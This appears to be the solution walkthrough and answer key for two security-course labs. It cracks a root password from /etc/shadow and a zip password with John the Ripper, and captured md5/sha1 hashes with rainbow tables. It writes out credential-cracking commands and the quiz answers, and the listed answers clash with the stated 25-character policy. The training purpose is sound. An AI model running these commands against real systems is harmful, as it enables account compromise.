Solution 1. Crack the root password on Support as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type cd /usr/share/john and press Enter to change directories to the folder containing the John the Ripper password file. c. Type ls and press Enter to list the files in the directory. d. Type cat password.lst and press Enter to view the password list. This is an abbreviated list. e. Type cd and press Enter to go back to root. f. Type john /etc/shadow and press Enter to crack the Linux passwords. Notice that the root password of 1worm4b8 was cracked. g. Type john /etc/shadow and press Enter to attempt to crack the Linux passwords again. Notice that it does not attempt to crack the password again. The cracked password is already stored in the john.pot file. h. Type cat ./.john/john.pot and press Enter to view the contents of the john.pot file. i. Type john /etc/shadow --show and press Enter as an alternate method of viewing the previously cracked password. j. In the top right, select Answer Questions. k. In Terminal, find the root password and answer the question. 2. Crack the password of the protected.zip file as follows: a. From the top navigation tabs, select Floor 1 Overview. b. Under IT Administration, select IT-Laptop. c. From the Favorites bar, open Terminal. d. At the prompt, type ls and press Enter to view the contents of the home directory. Notice the protected.zip file you wish to crack. e. Type zip2john protected.zip > ziphash.txt and press Enter to copy the hashes to a text file. f. Type cat ziphash.txt and press Enter to confirm that the hashes have been copied. g. Type john --format=pkzip ziphash.txt and press Enter to crack the password. Notice that the password of p@ssw0rd was cracked. h. Type john ziphash.txt --show and press Enter to show the password. i. In the top right, select Answer Questions. j. In Terminal, find the password for the file and answer the question. k. Select Score Lab. Question 1: 1worm4b8 Question 2: p@ssw0rd
8.1.7 Crack a password with rainbow tables While doing some penetration testing for your company, you captured some password hashes. The password hashes are saved in the root user's home directory /root/captured_hashes.txt. Now you want to hack these passwords using a rainbow table. The password requirements for your company are as follows: The password must be 25 or more characters in length. The password must include at least one upper and one lowercase letter. The password must have at least one of these special characters: ! " # $ % & _ ' * @ All passwords are encrypted using a hash algorithm of either md5 or sha1. In this lab, your task is to: Create md5 and sha1 rainbow tables using rtgen. Sort the rainbow tables using rtsort. Crack the hashes using rcrack. You must run rcrack on one individual hash and run it on the hash file. Answer the question.
Solution 1. From the Favorites bar, open Terminal. 2. At the prompt, type rtgen md5 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a md5 rainbow crack table. 3. Type rtgen sha1 ascii-32-95 1 20 0 1000 1000 0 and press Enter to create a sha1 rainbow crack table. 4. Type rtsort . and press Enter to sort the rainbow table. 5. Type rcrack . -l /root/captured_hashes.txt and press Enter to crack the password contained in a hash file. 6. Type rcrack . -h hash_value and press Enter to crack the password contained in a hash. 7. In the top right, select Answer Questions. 8. Answer the questions. Question 1: 123 Question 2: MaryHad_A_Sm@ll_Lamb Question 3: DisneyL@nd3
